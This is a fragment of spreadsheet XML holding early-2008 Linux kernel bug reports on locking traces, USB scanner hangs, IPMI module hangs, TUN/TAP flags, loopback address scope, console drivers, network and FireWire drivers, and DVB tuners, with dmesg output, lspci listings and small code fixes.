    <t>Latest working kernel version: 2.6.24-rc7 Earliest failing kernel version: 2.6.24-rc8 Distribution: Gentoo Hardware Environment: Dell Software Environment: Problem Description: Steps to reproduce: I didnt catch how to reproduce, appeared while worked in screen Here is dmesg [625138.248260] ============================================= [625138.248542] [ INFO: possible recursive locking detected ] [625138.248686] 2.6.24-rc8-devel #2 [625138.248821] --------------------------------------------- [625138.248963] screen/18164 is trying to acquire lock: [625138.249101] (&amp;q-&gt;lock){++..}, at: [&lt;c01175ff&gt;] __wake_up+0x15/0x42 [625138.249454] [625138.249456] but task is already holding lock: [625138.249724] (&amp;q-&gt;lock){++..}, at: [&lt;c01175ff&gt;] __wake_up+0x15/0x42 [625138.250073] [625138.250075] other info that might help us debug this: [625138.250343] 2 locks held by screen/18164: [625138.250477] #0: (&amp;tty-&gt;atomic_read_lock){--..}, at: [&lt;c0231a6c&gt;] read_chan+0x18f/0x50b [625138.250960] #1: (&amp;q-&gt;lock){++..}, at: [&lt;c01175ff&gt;] __wake_up+0x15/0x42 [625138.251356] [625138.251357] stack backtrace: [625138.251623] Pid: 18164, comm: screen Not tainted 2.6.24-rc8-devel #2 [625138.251764] [&lt;c0105e84&gt;] show_trace_log_lvl+0x1a/0x2f [625138.251959] [&lt;c010682c&gt;] show_trace+0x12/0x14 [625138.252150] [&lt;c0107123&gt;] dump_stack+0x6c/0x72 [625138.252338] [&lt;c01384c0&gt;] __lock_acquire+0x172/0xb8c [625138.252533] [&lt;c01392a7&gt;] lock_acquire+0x5f/0x78 [625138.252725] [&lt;c032afa7&gt;] _spin_lock_irqsave+0x34/0x44 [625138.252920] [&lt;c01175ff&gt;] __wake_up+0x15/0x42 [625138.253108] [&lt;c0186a16&gt;] ep_poll_safewake+0x8e/0xbf [625138.253300] [&lt;c01876df&gt;] ep_poll_callback+0x9f/0xac [625138.253491] [&lt;c0115d36&gt;] __wake_up_common+0x32/0x5c [625138.253688] [&lt;c011761b&gt;] __wake_up+0x31/0x42 [625138.253878] [&lt;c022c803&gt;] tty_wakeup+0x4f/0x54 [625138.254070] [&lt;c0232c7c&gt;] pty_unthrottle+0x15/0x21 [625138.254258] [&lt;c022ffe3&gt;] check_unthrottle+0x2e/0x30 [625138.254445] [&lt;c0231cf4&gt;] read_chan+0x417/0x50b [625138.254633] [&lt;c022ec67&gt;] tty_read+0x66/0xac [625138.254819] [&lt;c01628dc&gt;] vfs_read+0x8e/0x117 [625138.255004] [&lt;c0162d10&gt;] sys_read+0x3d/0x61 [625138.255190] [&lt;c0104dee&gt;] sysenter_past_esp+0x5f/0xa5 [625138.255376] =======================</t>
  </si>
  <si>
    <t>strange USB related problem</t>
  </si>
  <si>
    <t>2.6.23 and above</t>
  </si>
  <si>
    <t>2008-01-21 10:23 UTC</t>
  </si>
  <si>
    <t>Serge Gavrilov</t>
  </si>
  <si>
    <t>2008-09-29 11:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.22.12 Earliest failing kernel version: 2.6.23.9 Distribution: Gentoo Hardware Environment: 00:00.0 Host bridge: Intel Corporation 975X Express Memory Controller Hub (rev c0) Subsystem: ASUSTeK Computer Inc. Unknown device 8178 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:01.0 PCI bridge: Intel Corporation 975X Express PCI Express Root Port (rev c0) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=06, subordinate=06, sec-latency=0 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: faa00000-feafffff Prefetchable memory behind bridge: 00000000cff00000-00000000efefffff Capabilities: [88] Subsystem: Intel Corporation Unknown device 0000 Capabilities: [80] Power Management version 2 Capabilities: [90] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [a0] Express Root Port (Slot+) IRQ 0 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 Prefetchable memory behind bridge: 00000000cfe00000-00000000cfefffff Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Capabilities: [a0] Power Management version 2 00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 01) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: fa900000-fa9fffff Capabilities: [40] Express Root Port (Slot-) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Capabilities: [a0] Power Management version 2 00:1c.4 PCI bridge: Intel Corporation 82801GR/GH/GHM (ICH7 Family) PCI Express Port 5 (rev 01) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000a000-0000afff Memory behind bridge: fa800000-fa8fffff Capabilities: [40] Express Root Port (Slot-) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Capabilities: [a0] Power Management version 2 00:1c.5 PCI bridge: Intel Corporation 82801GR/GH/GHM (ICH7 Family) PCI Express Port 6 (rev 01) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 00009000-00009fff Memory behind bridge: fa700000-fa7fffff Capabilities: [40] Express Root Port (Slot-) IRQ 0 Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [90] Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Capabilities: [a0] Power Management version 2 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 01) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 22 I/O ports at e480 [size=32] 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 01) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 18 I/O ports at e800 [size=32] 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 01) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 21 I/O ports at e880 [size=32] 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 01) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 17 I/O ports at ec00 [size=32] 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 22 Memory at febffc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Capabilities: [58] Debug port 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev e1) (prog-if 01 [Subtractive decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 00008000-00008fff Memory behind bridge: fa600000-fa6fffff Prefetchable memory behind bridge: 00000000cfd00000-00000000cfdfffff Capabilities: [50] Subsystem: ASUSTeK Computer Inc. Unknown device 8179 00:1f.0 ISA bridge: Intel Corporation 82801GB/GR (ICH7 Family) LPC Interface Bridge (rev 01) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 01) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: bus master, medium devsel, latency 0, IRQ 20 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at ffa0 [size=16] 00:1f.2 SATA controller: Intel Corporation 82801GR/GH (ICH7 Family) Serial ATA Storage Controller AHCI (rev 01) (prog-if 01 [AHCI 1.0]) Subsystem: ASUSTeK Computer Inc. Unknown device 2606 Flags: bus master, 66MHz, medium devsel, latency 0, IRQ 19 I/O ports at e400 [size=8] I/O ports at e080 [size=4] I/O ports at e000 [size=8] I/O ports at dc00 [size=4] I/O ports at d880 [size=16] Memory at febff800 (32-bit, non-prefetchable) [size=1K] Capabilities: [80] Message Signalled Interrupts: Mask- 64bit- Queue=0/0 Enable- Capabilities: [70] Power Management version 2 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 01) Subsystem: ASUSTeK Computer Inc. Unknown device 8179 Flags: medium devsel, IRQ 19 I/O ports at 0400 [size=32] 01:00.0 Multimedia audio controller: VIA Technologies Inc. VT1720/24 [Envy24PT/HT] PCI Multi-Channel Audio Controller (rev 01) Subsystem: TERRATEC Electronic GmbH Aureon 7.1 Space Flags: bus master, medium devsel, latency 64, IRQ 23 I/O ports at 8c00 [size=32] I/O ports at 8880 [size=128] Capabilities: [80] Power Management version 1 01:01.0 Multimedia video controller: Brooktree Corporation Bt878 Video Capture (rev 11) Subsystem: Avermedia Technologies Inc AVerTV WDM Video Capture Flags: bus master, medium devsel, latency 64, IRQ 20 Memory at cfdfe000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 01:01.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11) Subsystem: Avermedia Technologies Inc AVerTV WDM Audio Capture Flags: bus master, medium devsel, latency 64, IRQ 5 Memory at cfdff000 (32-bit, prefetchable) [size=4K] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 01:03.0 FireWirrog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. Unknown device 815b Flags: bus master, medium devsel, latency 64, IRQ 23 Memory at fa6ff800 (32-bit, non-prefetchable) [size=2K] Memory at fa6f8000 (32-bit, non-prefetchable) [size=16K] Capabilities: [44] Power Management version 2 02:00.0 SATA controller: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) (prog-if 01 [AHCI 1.0]) Subsystem: ASUSTeK Computer Inc. Unknown device 81e4 Flags: bus master, fast devsel, latency 0, IRQ 18 Memory at fa7fe000 (32-bit, non-prefetchable) [size=8K] Expansion ROM at fa7e0000 [disabled] [size=64K] Capabilities: [68] Power Management version 2 Capabilities: [50] Express Legacy Endpoint IRQ 1 02:00.1 IDE interface: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) (prog-if 85 [Master SecO PriO]) Subsystem: ASUSTeK Computer Inc. Unknown device 81e4 Flags: bus master, fast devsel, latency 0, IRQ 21 I/O ports at 9c00 [size=8] I/O ports at 9880 [size=4] I/O ports at 9800 [size=8] I/O ports at 9480 [size=4] I/O ports at 9400 [size=16] Capabilities: [68] Power Management version 2 03:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 20) Subsystem: ASUSTeK Computer Inc. Marvell 88E8053 Gigabit Ethernet controller PCIe (Asus) Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at fa8fc000 (64-bit, non-prefetchable) [size=16K] I/O ports at a800 [size=256] Expansion ROM at fa8c0000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Capabilities: [50] Vital Product Data Capabilities: [5c] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable- Capabilities: [e0] Express Legacy Endpoint IRQ 0 04:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 20) Subsystem: ASUSTeK Computer Inc. Marvell 88E8053 Gigabit Ethernet controller PCIe (Asus) Flags: bus master, fast devsel, latency 0, IRQ 17 Memory at fa9fc000 (64-bit, non-prefetchable) [size=16K] I/O ports at b800 [size=256] Expansion ROM at fa9c0000 [disabled] [size=128K] Capabilities: [48] Power Management version 2 Capabilities: [50] Vital Product Data Capabilities: [5c] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable- Capabilities: [e0] Express Legacy Endpoint IRQ 0 06:00.0 VGA compatible controller: nVidia Corporation Unknown device 0393 (rev a1) (prog-if 00 [VGA]) Subsystem: ASUSTeK Computer Inc. Unknown device 820e Flags: bus master, fast devsel, latency 0, IRQ 16 Memory at fd000000 (32-bit, non-prefetchable) [size=16M] Memory at d0000000 (64-bit, prefetchable) [size=256M] Memory at fc000000 (64-bit, non-prefetchable) [size=16M] I/O ports at cc00 [size=128] [virtual] Expansion ROM at feae0000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Capabilities: [68] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Capabilities: [78] Express Endpoint IRQ 0 Problem Description: First of all, I am sorry for the stupid bug title. Perhaps, you can suggest Bus the better one :). I use Nikon Coolscan V film scanner to scan the negative films. 002 Device 005: ID 04b8:0110 Seiko Epson Corp. Perfection 1650 The software is Vuescan (http://www.hamrick.com). This is closed source, commercial product. I need this since I need infrared cleaning :(. This software uses libusb library to access the scanner. So, after upgrade from 2.6.20 to 2.6.23 the strange things become occur. After scanning approx 30-35 frames (one frame is approximately 150Mb of data) vuescan freezes (precisely, it goes into interruptible sleep). This can happen while scanning, and also is can happen while image processing (when the software does not talk with the scanner). Strace shows that the last system call is msync(..,MS_ASYNC). After that another processes marked as 'D' appear, and after some time the system becomes unresponsible. To prevent, it is possible kill X server. After that there are no processes marked as 'D' and the system seems to be absolutely normal. But, it is not the case. After some time 'D'-processes begin to appear again and the system become more or less unresponsible. So the system becomes completely broken and I need to reboot. I compiled the kernel with all possible debug options, but this error is not accompanies by any kernel message :(. With 2.6.23 this is absolutely reproducible result. But to reproduce I need approx 2 hours (this is scanning time) :( I also have tested 2.6.22 and 2.6.24. 2.6.22 seems to be not broken. With 2.6.24-rc8 the situation becomes worse: the system completely freezes after several scans. Thanks a lot for your work.</t>
  </si>
  <si>
    <t>2.6.26-rc1</t>
  </si>
  <si>
    <t>PowerEdge 2600 modprobe ipmi_si hangs</t>
  </si>
  <si>
    <t>2.6.20 - 2.6.23.12</t>
  </si>
  <si>
    <t>2008-01-22 06:58 UTC</t>
  </si>
  <si>
    <t>2008-09-22 10:36 UTC</t>
  </si>
  <si>
    <t>Dell Linux Engineering</t>
  </si>
  <si>
    <t>Date: Mon, 21 Jan 2008 09:40:59 +0800 From: william cheng &lt;opensourcewill@gmail.com&gt; To: linux-kernel@vger.kernel.org Subject: modprobing ipmi_si on Dell Power Edge 2600 make the terminal hang kernel ver. &gt;= 2.6.20 Dear all, We got some problem on modprobing the ipmi_si module on Dell Power Edge 2600. On modprobing the ipmi_si the terminal hang and the process cannot be terminated by control-C. We got these messages in dmesg ipmi message handler version 39.1 IPMI System Interface driver. ipmi_si: Trying SMBIOS-specified bt state machine at i/o address 0xe4, slave address 0x20, irq 10 Using irq 10 IPMI BT: req2rsp=10 secs retries=3 ipmi_si: Error clearing flags: c6 We have tested a few other dell machine (Power Edge 2500, 2900, ....), and this problem only occurs in Power Edge 2600. The problem occurs in the following testes Debian testing lenny Ubuntu 7.10 Ubuntu 7.04 Fedore 8 Kernel 2.6.20 Kernel 2.6.21 Kernel 2.6.22 Kernel 2.6.22.5 Kernel 2.6.22.14 Kernel 2.6.22.15 Kernel 2.6.23.12 While in the following testes we can successfully modprobe the ipmi_si Ubuntu 6.10 Debian 4.0r2 Kernel 2.6.18.3 Kernel 2.6.18.5 Kernel 2.6.18.8 Kernel 2.6.19 Kernel 2.6.19.7 It looks like the problem only occurs when using kernel after 2.6.20 with Power Edge 2600. Anyone know the reason for that? Any additional information should I provide? Thanks William Latest working kernel version: 2.6.19 Earliest failing kernel version: 2.6.20 Distribution: Debian testing lenny Ubuntu 7.10 Ubuntu 7.04 Fedore 8 Kernel 2.6.20 Kernel 2.6.21 Kernel 2.6.22 Kernel 2.6.22.5 Kernel 2.6.22.14 Kernel 2.6.22.15 Kernel 2.6.23.12 Hardware Environment: Dell PowerEdge 2600 Software Environment: Problem Description: see above Steps to reproduce: modprobe ipmi_si</t>
  </si>
  <si>
    <t>(tun dev) Impossible to deassert IFF_ONE_QUEUE or IFF_NO_PI</t>
  </si>
  <si>
    <t>2008-01-23 13:13 UTC</t>
  </si>
  <si>
    <t>Nathaniel Filardo</t>
  </si>
  <si>
    <t>2009-03-24 04:13 UTC</t>
  </si>
  <si>
    <t>Problem Description: The TUN/TAP driver only permits one-way transitions of IFF_NO_PI or IFF_ONE_QUEUE during the lifetime of a tap/tun interface. Note that tun_set_iff contains 541 if (ifr-&gt;ifr_flags &amp; IFF_NO_PI) 542 tun-&gt;flags |= TUN_NO_PI; 543 544 if (ifr-&gt;ifr_flags &amp; IFF_ONE_QUEUE) 545 tun-&gt;flags |= TUN_ONE_QUEUE; This is easily fixed by adding else branches which clear these bits. Steps to reproduce: This is easily reproduced by setting an interface persistant using tunctl then attempting to open it as IFF_TAP or IFF_TUN, without asserting the IFF_NO_PI flag. The ioctl() will succeed and the ifr.flags word is not modified, but the interface remains in IFF_NO_PI mode (as it was set by tunctl).</t>
  </si>
  <si>
    <t>Loopback address to eth0 interface changes scope permanently</t>
  </si>
  <si>
    <t>2008-01-25 02:04 UTC</t>
  </si>
  <si>
    <t>Bjørn Mork</t>
  </si>
  <si>
    <t>2008-04-17 02:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: 2.6.18 (verified, but most likely "any") Distribution: Debian Hardware Environment: Software Environment: Problem Description: From gary.manchon@gmail.com : After a bad network interface configuration (ifconfig eth0 127.0.0.1), I cannot recover the network without rebooting the kernel. This is my working configuration : # ifconfig eth0 Link encap:Ethernet HWaddr 00:90:3E:1F:1C:17 inet addr:192.168.240.195 Bcast:192.168.247.255 Mask:255.255.248.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:26 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2633 (2.5 KiB) TX bytes:0 (0.0 B) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) # route Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.240.0 * 255.255.248.0 U 0 0 0 eth0 default 192.168.240.1 0.0.0.0 UG 0 0 0 eth0 # ping -c 1 66.102.11.99 PING 66.102.11.99 (66.102.11.99): 56 data bytes 64 bytes from 66.102.11.99: icmp_seq=0 ttl=63 time=4.5 ms --- 66.102.11.99 ping statistics --- 1 packets transmitted, 1 packets received, 0% packet loss round-trip min/avg/max = 4.5/4.5/4.5 ms Steps to reproduce: # ifconfig eth0 127.0.0.1 # ifconfig eth0 192.168.240.195 netmask 255.255.248.0 # route add default gw 192.168.240.1 From Bjørn Mork &lt;bjorn@mork.no&gt; : I suspect that the problem might be this code in net/ipv4/devinet.c , which sets ifa_scope to RT_SCOPE_HOST if you configure a loopback address (127/8) on any interface. I guess it's there to protect us from sending packets with a loopback source address, which woulnd't look too good: static int inet_set_ifa(struct net_device *dev, struct in_ifaddr *ifa) { struct in_device *in_dev = __in_dev_get_rtnl(dev); ASSERT_RTNL(); if (!in_dev) { inet_free_ifa(ifa); return -ENOBUFS; } ipv4_devconf_setall(in_dev); if (ifa-&gt;ifa_dev != in_dev) { BUG_TRAP(!ifa-&gt;ifa_dev); in_dev_hold(in_dev); ifa-&gt;ifa_dev = in_dev; } if (LOOPBACK(ifa-&gt;ifa_local)) ifa-&gt;ifa_scope = RT_SCOPE_HOST; return inet_insert_ifa(ifa); } The real problem is that there's never anything resetting this scope if you change the address later. The attached patch fixes this. dhcp232:~# ip addr show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:aa:00:ff:00:ff brd ff:ff:ff:ff:ff:ff inet 192.168.3.232/24 brd 192.168.3.255 scope global eth0 inet6 2001:16d8:ffb4:0:2aa:ff:feff:ff/64 scope global dynamic valid_lft 2591971sec preferred_lft 604771sec inet6 fe80::2aa:ff:feff:ff/64 scope link valid_lft forever preferred_lft forever dhcp232:~# ifconfig eth0 127.0.0.1 dhcp232:~# ip addr show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:aa:00:ff:00:ff brd ff:ff:ff:ff:ff:ff inet 127.0.0.1/8 brd 127.255.255.255 scope host eth0 inet6 2001:16d8:ffb4:0:2aa:ff:feff:ff/64 scope global dynamic valid_lft 2591951sec preferred_lft 604751sec inet6 fe80::2aa:ff:feff:ff/64 scope link valid_lft forever preferred_lft forever dhcp232:~# ifconfig eth0 192.168.3.232 dhcp232:~# ip addr show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:aa:00:ff:00:ff brd ff:ff:ff:ff:ff:ff inet 192.168.3.232/24 brd 192.168.3.255 scope host eth0 inet6 2001:16d8:ffb4:0:2aa:ff:feff:ff/64 scope global dynamic valid_lft 2591933sec preferred_lft 604733sec inet6 fe80::2aa:ff:feff:ff/64 scope link valid_lft forever preferred_lft forever Notice how the scope changes from "global" to "host" when configuring 127.0.0.1, and just never changes back. It will stay that way forever, or until something changes the scope or deletes the address. Deleting the addresss and re-adding it will work around the problem: dhcp232:~# ip addr del 192.168.3.232/24 dev eth0 dhcp232:~# ifconfig eth0 192.168.3.232 dhcp232:~# ip addr show dev eth0 2: eth0: &lt;BROADCAST,MULTICAST,UP,10000&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:aa:00:ff:00:ff brd ff:ff:ff:ff:ff:ff inet 192.168.3.232/24 brd 192.168.3.255 scope global eth0 inet6 2001:16d8:ffb4:0:2aa:ff:feff:ff/64 scope global dynamic valid_lft 2591963sec preferred_lft 604763sec inet6 fe80::2aa:ff:feff:ff/64 scope link valid_lft forever preferred_lft forever Bjørn</t>
  </si>
  <si>
    <t>Reinette Chatre</t>
  </si>
  <si>
    <t>mdacon messing up console on hw w/o MDA adapter</t>
  </si>
  <si>
    <t>2.6.24 and before</t>
  </si>
  <si>
    <t>2008-01-26 06:00 UTC</t>
  </si>
  <si>
    <t>2008-10-09 09:24 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: didn`t try before Earliest failing kernel version: don`t know, but may exist for a long time Distribution: openSuSE Hardware Environment: various (e.g. FSC Scenic T 1Ghz i815 PC, FSC Lifebook, VMware Workstation) Software Environment: - Problem Description: loading mdacon on a system without MDA adapter screws up the console window. i cannot use it afterwards. i would have expected some "no mda adapter found" and a clean exit afterwards. Steps to reproduce: modprobe mdacon also see: http://marc.info/?l=linux-kernel&amp;m=120082731013963&amp;w=2 http://uwsg.indiana.edu/hypermail/linux/kernel/0203.3/0524.html same issue with cfag12864bfb. behaviour is a little bit different, but console is also unusable afterwards.</t>
  </si>
  <si>
    <t>asix broken for speeds &lt; 1000baseT/Full</t>
  </si>
  <si>
    <t>at least &gt;= 2.6.23</t>
  </si>
  <si>
    <t>2008-01-26 09:16 UTC</t>
  </si>
  <si>
    <t>NotTheEvilOne</t>
  </si>
  <si>
    <t>2009-03-24 04:16 UTC</t>
  </si>
  <si>
    <t>Ben Dooks</t>
  </si>
  <si>
    <t>Problem Description: The asix network driver works as expected for Gigabit Ethernet. However it fails on a 100baseT/Full connection. wireshark and statistics show that the adapter actually doesn't send nothing. (The interface on the other end doesn't increase the packets count.) Steps to reproduce: Connect a ax88178 device with an 100mbit network. I'll try to find a git patch which caused the error.</t>
  </si>
  <si>
    <t>firewire-core: "kobject_add failed for fw5 with -EEXIST"</t>
  </si>
  <si>
    <t>2.6.22, 2.6.23, 2.6.24</t>
  </si>
  <si>
    <t>2008-01-26 14:58 UTC</t>
  </si>
  <si>
    <t>2008-02-28 02:24 UTC</t>
  </si>
  <si>
    <t>There are race conditions in the handling of drivers/firewire/fw-device.c::fw_device_idr which lead to firewire-core attempting to add new devices with same name as existing devices. This notably happens if a device is being shut down with error conditions and a new device is being created at the same time. See the WARNING in http://bugzilla.kernel.org/attachment.cgi?id=14580 for an example. Both fw_device_init() and fw_device_shutdown() call idr_remove() too early. Impact of the bug: Happens rarely, forces the user to unplug and replug the new device to get it working.</t>
  </si>
  <si>
    <t>MTD startup lock when using multiple nor flash chips</t>
  </si>
  <si>
    <t>2008-01-26 23:33 UTC</t>
  </si>
  <si>
    <t>Rizzo Davide</t>
  </si>
  <si>
    <t>2008-06-02 14:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.17 (not sure) Earliest failing kernel version: 2.6.18 (not sure) Distribution: kernel only in embedded system Hardware Environment: arm9 booting from 2 contiguous flash nor chip (4MB+4MB) Software Environment: kernel startup Problem Description: startup locks. I found and solved the problem, at line 115 of drivers/mtd/chips/gen_probe.c (kernel 2.6.24): mapsize value must be calculated in bytes, not in long. I replaced line 115 from: mapsize = (max_chips + BITS_PER_LONG-1) / BITS_PER_LONG; to: mapsize = sizeof(long) * ( (max_chips + BITS_PER_LONG-1) / BITS_PER_LONG ); And all worked OK Steps to reproduce: boot up the kernel</t>
  </si>
  <si>
    <t>After resume from hibernation, DVB-T tuners are find in reverse order than they were found while booting</t>
  </si>
  <si>
    <t>2008-01-27 01:39 UTC</t>
  </si>
  <si>
    <t>2008-12-06 05:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.23 Distribution: Debian stable Hardware Environment: Pentium M laptop, 2 dvb-t dongles Software Environment: Debian stable, 2.6.24-vanilla Problem Description: I own 2 DVB-T dongles which are connected to 2 external antenas. When booting system discovers them i some order, when I suspend to disk and resume back system finds them in revers order. This is maybe acceptable with different devices, but when using it with external antennas I need physically swap cables! Dongle's drivers also don't have suspend/resume methods. Steps to reproduce: suspend/resume see dmesg usb 4-4: new high speed USB device using ehci_hcd and address 32 usb 4-4: configuration #1 chosen from 1 choice dvb-usb: found a 'Leadtek Winfast DTV Dongle (STK7700P based)' in cold state, will try to load a firmware dvb-usb: downloading firmware from file 'dvb-usb-dib0700-1.10.fw' dib0700: firmware started successfully. dvb-usb: found a 'Leadtek Winfast DTV Dongle (STK7700P based)' in warm state. i2c-adapter i2c-5: SMBus Quick command not supported, can't probe for chips dvb-usb: will pass the complete MPEG2 transport stream to the software demuxer. DVB: registering new adapter (Leadtek Winfast DTV Dongle (STK7700P based)) i2c-adapter i2c-6: SMBus Quick command not supported, can't probe for chips DVB: registering frontend 0 (DiBcom 7000MA/MB/PA/PB/MC)... MT2060: successfully identified (IF1 = 1220) input: IR-receiver inside an USB DVB receiver as /devices/pci0000:00/0000:00:1d.7/usb4/4-4/input/input24 dvb-usb: schedule remote query interval to 150 msecs. dvb-usb: Leadtek Winfast DTV Dongle (STK7700P based) successfully initialized and connected. usb 1-2: new full speed USB device using uhci_hcd and address 11 usb 1-2: configuration #1 chosen from 1 choice usb 4-1: USB disconnect, address 30 dvb-usb: generic DVB-USB module successfully deinitialized and disconnected. usb 4-1: new high speed USB device using ehci_hcd and address 33 usb 4-1: configuration #1 chosen from 1 choice dvb-usb: found a 'WideView WT-220U PenType Receiver (Typhoon/Freecom)' in warm state. dvb-usb: will use the device's hardware PID filter (table count: 15). DVB: registering new adapter (WideView WT-220U PenType Receiver (Typhoon/Freecom)) DVB: registering frontend 1 (WideView USB DVB-T)... input: IR-receiver inside an USB DVB receiver as /devices/pci0000:00/0000:00:1d.7/usb4/4-1/input/input25 dvb-usb: schedule remote query interval to 300 msecs. dvb-usb: WideView WT-220U PenType Receiver (Typhoon/Freecom) successfully initialized and connected. dvb-usb: recv bulk message failed: -110</t>
  </si>
  <si>
    <t>VIDEO_DEV=y/m, I2C=n compile error</t>
  </si>
  <si>
    <t>2.6.24-git</t>
  </si>
  <si>
    <t>2008-01-27 13:11 UTC</t>
  </si>
  <si>
    <t>2008-02-19 15:12 UTC</t>
  </si>
  <si>
    <t>9965 10028</t>
  </si>
  <si>
    <t>Subject : VIDEO_DEV=y/m, I2C=n compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/1/27/175</t>
  </si>
  <si>
    <t>key 49 and 94 send both 49 and 94 events on macbooks REGRESSION</t>
  </si>
  <si>
    <t>2.6.24-git5</t>
  </si>
  <si>
    <t>2008-01-29 08:15 UTC</t>
  </si>
  <si>
    <t>2008-02-17 22:24 UTC</t>
  </si>
  <si>
